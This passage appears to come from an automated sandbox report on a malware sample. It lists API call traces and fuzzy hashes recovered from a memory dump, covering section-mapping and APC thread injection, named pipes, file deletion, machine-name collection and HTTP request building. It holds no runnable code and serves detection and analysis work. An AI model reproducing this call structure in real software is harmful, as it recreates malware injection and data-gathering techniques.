  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
